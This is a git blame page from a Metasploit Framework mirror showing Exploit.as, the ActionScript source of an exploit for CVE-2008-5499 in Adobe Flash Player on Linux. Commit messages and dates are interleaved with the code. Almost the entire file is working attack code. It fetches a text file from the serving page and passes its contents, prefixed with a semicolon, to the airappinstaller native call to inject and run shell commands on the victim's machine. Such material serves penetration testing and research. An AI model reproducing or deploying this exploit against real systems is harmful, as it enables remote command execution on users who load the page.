infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
metasploit-framework/external/source/exploits/CVE-2008-5499/Exploit.as

48 lines
1.2 KiB
ActionScript
Raw Normal View History

new file: data/exploits/CVE-2008-5499.swf new file: external/source/exploits/CVE-2008-5499/Exploit.as new file: modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb
2012-04-10 19:58:22 +00:00
/*
Compile: mtasc -version 8 -swf Exploit.swf -main -header 800:600:20 Exploit.as
Author: 0a29406d9794e4f9b30b3c5d6702c708 / Unknown / metasploit
PoC: http://downloads.securityfocus.com/vulnerabilities/exploits/32896.as
*/
clear whitespace
2012-04-12 06:08:22 +00:00
new file: data/exploits/CVE-2008-5499.swf new file: external/source/exploits/CVE-2008-5499/Exploit.as new file: modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb
2012-04-10 19:58:22 +00:00
import flash.external.ExternalInterface;
clear whitespace
2012-04-12 06:08:22 +00:00
new file: data/exploits/CVE-2008-5499.swf new file: external/source/exploits/CVE-2008-5499/Exploit.as new file: modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb
2012-04-10 19:58:22 +00:00
class Exploit {
Minor fixes
2012-04-19 23:07:35 +00:00
new file: data/exploits/CVE-2008-5499.swf new file: external/source/exploits/CVE-2008-5499/Exploit.as new file: modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb
2012-04-10 19:58:22 +00:00
public function randname(newLength:Number):String{
clear whitespace
2012-04-12 06:08:22 +00:00
var a:String = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
var alphabet:Array = a.split("");
var randomLetter:String = "";
Minor fixes
2012-04-19 23:07:35 +00:00
clear whitespace
2012-04-12 06:08:22 +00:00
for (var i:Number = 0; i < newLength; i++){
randomLetter += alphabet[Math.floor(Math.random() * alphabet.length)];
}
Minor fixes
2012-04-19 23:07:35 +00:00
clear whitespace
2012-04-12 06:08:22 +00:00
return randomLetter;
}
new file: data/exploits/CVE-2008-5499.swf new file: external/source/exploits/CVE-2008-5499/Exploit.as new file: modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb
2012-04-10 19:58:22 +00:00
public function exploit() {
var path:String = ExternalInterface.call("window.location.href.toString") + randname(6) + ".txt";
var loadVars:LoadVars = new LoadVars();
Minor fixes
2012-04-19 23:07:35 +00:00
new file: data/exploits/CVE-2008-5499.swf new file: external/source/exploits/CVE-2008-5499/Exploit.as new file: modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb
2012-04-10 19:58:22 +00:00
loadVars.onData = function(str:String):Void {
if (str) {
if (_global.ASnative(2201, 1)("airappinstaller")) {
_global.ASnative(2201, 2)("airappinstaller", "; " + str);
clear whitespace
2012-04-12 06:08:22 +00:00
}
new file: data/exploits/CVE-2008-5499.swf new file: external/source/exploits/CVE-2008-5499/Exploit.as new file: modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb
2012-04-10 19:58:22 +00:00
} else {
clear whitespace
2012-04-12 06:08:22 +00:00
// FAIL
new file: data/exploits/CVE-2008-5499.swf new file: external/source/exploits/CVE-2008-5499/Exploit.as new file: modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb
2012-04-10 19:58:22 +00:00
}
}
clear whitespace
2012-04-12 06:08:22 +00:00
loadVars.load(path);
}
new file: data/exploits/CVE-2008-5499.swf new file: external/source/exploits/CVE-2008-5499/Exploit.as new file: modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb
2012-04-10 19:58:22 +00:00
public function Exploit() {
Minor fixes
2012-04-19 23:07:35 +00:00
exploit();
clear whitespace
2012-04-12 06:08:22 +00:00
}
new file: data/exploits/CVE-2008-5499.swf new file: external/source/exploits/CVE-2008-5499/Exploit.as new file: modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb
2012-04-10 19:58:22 +00:00
static function main() {
var ex : Exploit;
ex = new Exploit();
}
}